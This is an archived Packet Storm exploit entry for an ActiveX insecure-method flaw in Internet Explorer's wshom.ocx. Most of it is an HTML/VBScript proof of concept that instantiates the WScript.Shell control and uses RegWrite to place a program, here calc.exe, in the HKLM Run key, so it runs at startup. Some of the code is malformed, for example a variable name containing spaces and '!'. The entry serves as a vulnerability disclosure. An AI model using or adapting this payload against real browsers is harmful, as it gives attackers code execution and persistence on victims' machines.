Internet Explorer wshom.ocx Active-X Insecure Method

2010-01-17T00:00:00
ID PACKETSTORM:85283
Type packetstorm
Reporter D3V!L FucK3r
Modified 2010-01-17T00:00:00

Description

                                        
                                            `==============================================================================  
_ _ _ _ _ _  
/ \ | | | | / \ | | | |  
/ _ \ | | | | / _ \ | |_| |  
/ ___ \ | |___ | |___ / ___ \ | _ |  
IN THE NAME OF /_/ \_\ |_____| |_____| /_/ \_\ |_| |_|  
  
  
==============================================================================  
#Exploit title:0-day Interner Explorer ActiveX remote code Execution 2 (insecure method)  
#version: all versions  
#Author: [D3V!L FUCKER & germaya_x]  
#special thanx: [for my best friend his0k4].  
#Geetz [2] :[Sarbot511 ,thrid-devil ,ahwak2000].  
#tested on : windows 7 , windows vista ,windows xp sp2  
#n0te:you can use it by run it then restart the computer once it open you will show the calc.exe  
==============================================================================  
<html>  
<object classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B' id='target' ></object>  
<script language='vbscript'>  
  
targetFile = "c:\WINDOWS\system32\wshom.ocx"  
prototype = "Sub RegWrite ( ByVal Name As String , ByRef Value As Variant , [ ByRef Type As Variant ] )"  
memberName = "RegWrite"  
progid = "IWshRuntimeLibrary.IWshShell_Class"  
argCount = 3  
  
D3V!L FUCKER="HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\"  
germaya_x="C:\WINDOWS\system32\calc.exe"  
his0k4="REG_SZ"  
  
target.RegWrite D3V!L FUCKER ,germaya_x ,his0k4  
  
</script>  
`